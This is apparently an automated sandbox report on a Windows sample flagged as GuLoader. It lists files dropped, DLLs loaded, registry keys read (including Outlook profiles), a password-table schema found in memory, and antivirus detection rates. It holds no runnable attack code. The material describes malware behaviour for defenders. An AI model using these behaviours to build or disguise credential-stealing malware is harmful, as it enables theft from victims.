Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046EC

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

File created: C:\Users\user\spinsterishly

Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

File created: C:\Users\user\AppData\Local\Temp\nsa4648.tmp

Jump to behavior

Source: 4kobC6KGC3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038202000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000381F6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 4kobC6KGC3.exe	Virustotal: Detection: 77%
Source: 4kobC6KGC3.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

File read: C:\Users\user\Desktop\4kobC6KGC3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4kobC6KGC3.exe "C:\Users\user\Desktop\4kobC6KGC3.exe"
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process created: C:\Users\user\Desktop\4kobC6KGC3.exe "C:\Users\user\Desktop\4kobC6KGC3.exe"
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process created: C:\Users\user\Desktop\4kobC6KGC3.exe "C:\Users\user\Desktop\4kobC6KGC3.exe"	Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: timelanges.lnk.0.dr	LNK file: ..\..\..\Program Files (x86)\Common Files\prgedes.paa
Source: timelanges.lnk0.0.dr	LNK file: ..\..\..\Program Files (x86)\Common Files\prgedes.paa

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

File written: C:\Users\user\spinsterishly\Aphthartodocetic.ini

Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 4kobC6KGC3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.50858193838.0000000005BAE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Code function: 0_2_70471B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_70471B5F

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075F9C30 push esp; retf 0762h	2_2_075F9D55
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075F8DDF push esp; iretd	2_2_075F8DE0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075F8C2F pushfd ; iretd	2_2_075F8C30
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075F891E pushad ; iretd	2_2_075F891F

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

File created: C:\Users\user\AppData\Local\Temp\nsh4A12.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
